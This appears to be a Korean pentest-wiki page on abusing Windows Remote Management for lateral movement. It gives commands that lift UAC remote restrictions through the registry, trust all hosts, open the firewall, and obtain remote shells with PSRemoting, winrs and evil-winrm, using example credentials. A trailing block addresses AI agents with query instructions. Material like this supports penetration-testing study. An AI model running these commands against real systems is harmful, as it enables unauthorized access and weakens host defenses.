# winrm

winrm(Windows Remote Management)은 Windows에서 원격 명령 실행을 위한 프로토콜입니다.

AD 환경에서는 Remote Management Users 그룹에 속한 도메인 계정은 winrm이 활성화된 모든 컴퓨터에 연결할 수 있지만, Windows 로컬의 경우 별도로 UAC 원격 제안으로 인해 네트워크 연결이 불가능합니다.

대상 시스템에 관리자 권한(High mandatory level)의 원격 명령 실행이 가능할 경우 해당 레지스트리를 수정하여 네트워크 접속을 허용할 수 있습니다.

## Abuse

<pre class="language-powershell"><code class="lang-powershell"><strong># UAC 원격 제한 해제
</strong>reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

<strong># winrm 서비스 시작 및 설정 구성
</strong>net start winrm
Set-Item WSMAN:\localhost\Client\TrustedHosts -Value "*" -Force
Set-NetFirewallRule -Name 'WINRM-HTTP-In-TCP' -RemoteAddress Any
</code></pre>

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># 원격 서버와의 시간 동기화
</strong>w32tm /config /manualpeerlist:"AD01.CONTOSO.COM" /syncfromflags:manual /update
w32tm /resync /force

<strong># PSRemoting으로 원격 쉘 획득
</strong>$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('CONTOSO\Administrator', $pass)
Enter-PSSession -ComputerName DC01 -Credential $cred

<strong># 쉘 획득 없이 원라인 커맨드 실행
</strong>winrs /r:http://'&#x3C;target-ip>':5985/wsman /u:'&#x3C;username>' /p:'&#x3C;password>' whoami
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash"><code class="lang-bash"><strong># winrm 원격 쉘 획득
</strong>evil-winrm -i 192.168.1.11 -u Administrator -p 'Password123!'
</code></pre>

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://dmcxblue.gitbook.io/red-team-notes/lateral-movement/windows-remote-management>" %}

{% embed url="<https://learn.microsoft.com/en-us/windows/win32/winrm/portal>" %}

{% embed url="<https://learn.microsoft.com/ko-kr/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/lateral-movement/windows/winrm.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.